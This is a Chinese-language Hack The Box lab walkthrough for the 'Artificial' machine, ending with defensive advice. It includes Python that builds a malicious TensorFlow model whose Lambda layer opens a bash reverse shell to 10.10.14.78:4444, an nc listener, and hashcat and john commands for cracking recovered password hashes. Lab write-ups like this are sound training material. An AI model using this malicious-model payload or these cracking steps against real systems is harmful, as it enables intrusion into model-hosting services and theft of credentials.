HTB Artificial 靶场渗透测试教学文档<\/h1>

靶机概述<\/h2>

名称：HTB Artificial<\/li>
难度：简单（但需要特定知识）<\/li>
操作系统：Ubuntu<\/li>
开放端口：22(SSH)、80(HTTP)<\/li>

关键知识点：TensorFlow RCE、Backrest备份系统提权<\/li> <\/ul>

信息收集阶段<\/h2>

1. 基础扫描<\/h3>

nmap -sT --min-rate 10000<\/span> -p- 10.10.11.74 -oA nmapscan\/ports
<\/span><\/span>nmap -sT -Pn -sV -sC -O -p22,80 10.10.11.74
<\/span><\/span><\/code><\/pre>发现：<\/p>

域名：artificial.htb<\/li>
添加到hosts文件：<\/li>
<\/ul>
echo '10.10.11.74 artificial.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. 子域名探测<\/h3>
gobuster vhost -w \/usr\/share\/wordlists\/amass\/subdomains-top1mil-5000.txt -u http:\/\/artificial.htb -t 30<\/span> --append-domain
<\/span><\/span><\/code><\/pre>(未发现有效子域名)<\/p>
3. Web信息收集<\/h3>
使用whatweb和dirsearch工具：<\/p>
dirsearch -u http:\/\/artificial.htb\/ -e * -x 404<\/span>
<\/span><\/span><\/code><\/pre>发现注册和登录页面<\/p>
漏洞探测与利用<\/h2>
1. 网站功能分析<\/h3>

在线AI业务平台<\/li>
可上传、管理和运行AI模型<\/li>
使用TensorFlow框架（2.13.1版本）<\/li>
<\/ul>
2. 环境准备<\/h3>
注意<\/strong>：TensorFlow最新版仅支持Python 3.12，Kali默认可能是Python 3.13<\/p>
解决方案：<\/p>

降级Python版本<\/li>
或使用Docker构建环境：<\/li>
<\/ol>
docker build -t my-image .
<\/span><\/span>docker run -it my-image
<\/span><\/span><\/code><\/pre>3. TensorFlow RCE漏洞利用<\/h3>
利用TensorFlow Lambda层的代码执行漏洞构建恶意模型：<\/p>
import<\/span> tensorflow as<\/span> tf
<\/span><\/span>import<\/span> os
<\/span><\/span>
<\/span><\/span>def<\/span> exploit<\/span>(x):
<\/span><\/span>    import<\/span> os
<\/span><\/span>    os.<\/span>system("\/bin\/bash -i >& \/dev\/tcp\/10.10.14.78\/4444 0>&1"<\/span>)
<\/span><\/span>    return<\/span> x
<\/span><\/span>
<\/span><\/span>model =<\/span> tf.<\/span>keras.<\/span>Sequential()
<\/span><\/span>model.<\/span>add(tf.<\/span>keras.<\/span>layers.<\/span>Input(shape=<\/span>(64<\/span>,)))
<\/span><\/span>model.<\/span>add(tf.<\/span>keras.<\/span>layers.<\/span>Lambda(exploit))
<\/span><\/span>model.<\/span>compile()
<\/span><\/span>model.<\/span>save("model.h5"<\/span>)
<\/span><\/span><\/code><\/pre>步骤：<\/p>

生成model.h5文件<\/li>
在网站上传该模型<\/li>
本地设置监听：<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>
点击在线预览触发反弹shell<\/li>
<\/ol>
4. 初步提权<\/h3>

当前用户：app<\/li>
发现SQLite数据库：<\/li>
<\/ul>
sqlite3 users.db
<\/span><\/span>.tables
<\/span><\/span>select<\/span> * from user;
<\/span><\/span><\/code><\/pre>
发现用户gael及其MD5哈希：c99175974b6e192936d97224638a34f8<\/code><\/li>
使用hashcat爆破：<\/li>
<\/ul>
hashcat -m 0<\/span> c99175974b6e192936d97224638a34f8 \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>
获得密码后SSH登录gael用户<\/li>
<\/ul>
权限提升<\/h2>
1. 初步检查<\/h3>
检查sudo、suid、crontab等常规提权方式无果<\/p>
2. 使用linpeas收集信息<\/h3>
发现备份文件线索<\/p>
3. 备份文件分析<\/h3>

文件看似gzip压缩（.gz后缀），实际是tar文件<\/li>
正确解压方式：<\/li>
<\/ul>
tar xvf backup.tar
<\/span><\/span><\/code><\/pre>
在.config\/backrest\/config.json<\/code>中发现账号密码<\/li>
密码经过Base64编码的Bcrypt哈希<\/li>
<\/ul>
4. 密码破解步骤<\/h3>

Base64解码<\/li>
使用john破解Bcrypt哈希：<\/li>
<\/ol>
john --format=<\/span>bcrypt --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt hashes.txt
<\/span><\/span><\/code><\/pre>
获得密码后提权<\/li>
<\/ol>
关键知识点总结<\/h2>


TensorFlow RCE<\/strong>：<\/p>

Lambda层允许任意Python代码执行<\/li>
恶意模型可导致远程代码执行<\/li>
<\/ul>
<\/li>

密码破解技巧<\/strong>：<\/p>

识别哈希类型（MD5、Bcrypt）<\/li>
多层编码处理（Base64+Bcrypt）<\/li>
<\/ul>
<\/li>

备份文件分析<\/strong>：<\/p>

注意文件真实类型（file命令）<\/li>
配置文件中的敏感信息<\/li>
<\/ul>
<\/li>

环境适配<\/strong>：<\/p>

Python版本与库的兼容性问题<\/li>
Docker作为替代解决方案<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

对AI模型上传进行严格审查<\/li>
避免在Lambda层执行危险操作<\/li>
配置文件不应包含明文或弱加密密码<\/li>
备份文件应妥善保护权限<\/li>
使用强密码策略和加盐哈希<\/li>
<\/ol>

HTB Artificial 靶场渗透测试教学文档<\/h1>

信息收集阶段<\/h2>

漏洞探测与利用<\/h2>

权限提升<\/h2>

1. 初步检查<\/h3> 检查sudo、suid、crontab等常规提权方式无果<\/p>

2. 使用linpeas收集信息<\/h3> 发现备份文件线索<\/p>

防御建议<\/h2> 对AI模型上传进行严格审查<\/li> 避免在Lambda层执行危险操作<\/li> 配置文件不应包含明文或弱加密密码<\/li> 备份文件应妥善保护权限<\/li> 使用强密码策略和加盐哈希<\/li> <\/ol>

1. 初步检查<\/h3>
检查sudo、suid、crontab等常规提权方式无果<\/p>

2. 使用linpeas收集信息<\/h3>
发现备份文件线索<\/p>

防御建议<\/h2>

对AI模型上传进行严格审查<\/li>
避免在Lambda层执行危险操作<\/li>
配置文件不应包含明文或弱加密密码<\/li>
备份文件应妥善保护权限<\/li>
使用强密码策略和加盐哈希<\/li> <\/ol>